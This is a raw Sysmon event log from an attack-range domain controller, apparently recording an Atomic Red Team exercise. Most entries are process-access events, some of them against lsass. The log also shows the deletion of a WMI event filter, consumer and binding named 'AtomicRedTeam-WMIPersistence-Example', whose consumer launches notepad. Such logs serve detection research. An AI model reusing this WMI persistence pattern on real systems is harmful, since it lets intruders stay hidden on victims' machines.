10341000x80000000000000006260Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0E00-000000009101}1084C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006259Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0E00-000000009101}1084C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006258Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0D00-000000009101}992C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006257Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0D00-000000009101}992C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006256Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0C00-000000009101}596C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006255Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0C00-000000009101}596C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006254Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006253Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006252Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0900-000000009101}784C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006251Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0900-000000009101}784C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 19341900x80000000000000006250Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-WmiFilterEvent2020-12-08 13:54:48.514DeletedATTACKRANGE\Administrator "root\\CimV2" "AtomicRedTeam-WMIPersistence-Example" "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325" 20342000x80000000000000006249Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-WmiConsumerEvent2020-12-08 13:54:48.514DeletedATTACKRANGE\Administrator "AtomicRedTeam-WMIPersistence-Example"Command Line "C:\\Windows\\System32\\notepad.exe" 21342100x80000000000000006248Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-WmiBindingEvent2020-12-08 13:54:48.514DeletedATTACKRANGE\Administrator "\\\\.\\ROOT\\Subscription:CommandLineEventConsumer.Name=\"AtomicRedTeam-WMIPersistence-Example\"" "\\\\.\\ROOT\\Subscription:__EventFilter.Name=\"AtomicRedTeam-WMIPersistence-Example\"" 10341000x80000000000000006247Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.342{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-85A8-5FCF-FC00-000000009101}4132C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006246Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.342{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-85A8-5FCF-FC00-000000009101}4132C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006245Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.311{10ACEC4A-85A8-5FCF-FC00-000000009101}4132C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_1a24eite.sjk.ps12020-12-08 13:54:48.311 10341000x80000000000000006244Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.295{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-85A8-5FCF-FC00-000000009101}4132C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006243Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A8-5FCF-FC00-000000009101}4132C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006242Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A8-5FCF-FC00-000000009101}4132C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006241Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A7-5FCF-F700-000000009101}816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006240Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A7-5FCF-F700-000000009101}816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006239Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-F300-000000009101}4636C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006238Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-F300-000000009101}4636C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006237Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-F200-000000009101}748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006236Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-F200-000000009101}748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006235Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-F100-000000009101}4156C:\Windows\system32\cmd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006234Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-F100-000000009101}4156C:\Windows\system32\cmd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006233Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 